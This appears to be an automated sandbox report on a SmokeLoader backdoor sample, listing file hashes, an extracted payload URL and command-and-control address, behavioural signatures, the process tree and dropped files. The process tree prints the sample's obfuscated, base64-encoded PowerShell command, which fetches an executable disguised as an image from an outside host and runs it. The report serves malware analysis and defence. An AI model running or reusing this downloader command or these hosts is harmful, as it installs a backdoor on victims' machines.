Analysis
-
max time kernel
21s -
max time network
20s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
13-04-2021 08:49
Static task
static1
Behavioral task
behavioral1
Sample
9fbd32c6bb25f6a660696fa9830c5040.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
9fbd32c6bb25f6a660696fa9830c5040.exe
Resource
win10v20210410
General
-
Target
9fbd32c6bb25f6a660696fa9830c5040.exe
-
Size
847KB
-
MD5
9fbd32c6bb25f6a660696fa9830c5040
-
SHA1
1e41347d36792e823a8982b10170d83a0722e3cc
-
SHA256
5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14
-
SHA512
3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb
Malware Config
Extracted
https://u.teknik.io/28oLW.jpg
Extracted
smokeloader
2018
http://94.140.115.43/1/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 464 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
eVDwACBtpW.exepid process 1708 eVDwACBtpW.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exepid process 464 powershell.exe 464 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
eVDwACBtpW.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum eVDwACBtpW.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 eVDwACBtpW.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2040 powershell.exe 2040 powershell.exe 464 powershell.exe 464 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
eVDwACBtpW.exepid process 1708 eVDwACBtpW.exe 1708 eVDwACBtpW.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2040 powershell.exe Token: SeDebugPrivilege 464 powershell.exe -
Suspicious use of FindShellTrayWindow 23 IoCs
Processes:
9fbd32c6bb25f6a660696fa9830c5040.exepid process 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe -
Suspicious use of SendNotifyMessage 23 IoCs
Processes:
9fbd32c6bb25f6a660696fa9830c5040.exepid process 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe 1776 9fbd32c6bb25f6a660696fa9830c5040.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
9fbd32c6bb25f6a660696fa9830c5040.exepowershell.exepowershell.exedescription pid process target process PID 1776 wrote to memory of 2040 1776 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 1776 wrote to memory of 2040 1776 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 1776 wrote to memory of 2040 1776 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 1776 wrote to memory of 2040 1776 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 2040 wrote to memory of 464 2040 powershell.exe powershell.exe PID 2040 wrote to memory of 464 2040 powershell.exe powershell.exe PID 2040 wrote to memory of 464 2040 powershell.exe powershell.exe PID 2040 wrote to memory of 464 2040 powershell.exe powershell.exe PID 464 wrote to memory of 1708 464 powershell.exe eVDwACBtpW.exe PID 464 wrote to memory of 1708 464 powershell.exe eVDwACBtpW.exe PID 464 wrote to memory of 1708 464 powershell.exe eVDwACBtpW.exe PID 464 wrote to memory of 1708 464 powershell.exe eVDwACBtpW.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe"C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"4⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
ae3067e23a7af06ef974bdad797877b7
SHA1f621492d6dc63df999906cf1e22331a560eb149b
SHA256029ccdd77aa2cd8ff438dc146bb0f68b5e8a928fcac9ed3fe3932f6fc862205c
SHA512772a978f8d545809404a1b59dbce5b79120ff5ade1ada35fc796f539d3c8991f26ba8ec79ab0f2386ff7b7bce738596328b383efb54f923eba44988da73b1a6e
-
\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
memory/464-93-0x00000000063C0000-0x00000000063C1000-memory.dmpFilesize
4KB
-
memory/464-94-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/464-68-0x0000000000000000-mapping.dmp
-
memory/464-73-0x0000000001EA0000-0x0000000002AEA000-memory.dmpFilesize
12.3MB
-
memory/464-79-0x0000000005700000-0x0000000005701000-memory.dmpFilesize
4KB
-
memory/464-84-0x0000000005770000-0x0000000005771000-memory.dmpFilesize
4KB
-
memory/464-85-0x0000000006330000-0x0000000006331000-memory.dmpFilesize
4KB
-
memory/464-92-0x00000000058F0000-0x00000000058F1000-memory.dmpFilesize
4KB
-
memory/1204-101-0x0000000002AB0000-0x0000000002AC5000-memory.dmpFilesize
84KB
-
memory/1204-100-0x0000000002AD0000-0x0000000002AD1000-memory.dmpFilesize
4KB
-
memory/1708-97-0x0000000000000000-mapping.dmp
-
memory/1776-59-0x0000000075C31000-0x0000000075C33000-memory.dmpFilesize
8KB
-
memory/2040-64-0x00000000048D0000-0x00000000048D1000-memory.dmpFilesize
4KB
-
memory/2040-63-0x0000000004910000-0x0000000004911000-memory.dmpFilesize
4KB
-
memory/2040-62-0x00000000022A0000-0x00000000022A1000-memory.dmpFilesize
4KB
-
memory/2040-65-0x00000000048D2000-0x00000000048D3000-memory.dmpFilesize
4KB
-
memory/2040-60-0x0000000000000000-mapping.dmp
-
memory/2040-67-0x0000000002710000-0x0000000002711000-memory.dmpFilesize
4KB
-
memory/2040-66-0x00000000025D0000-0x00000000025D1000-memory.dmpFilesize
4KB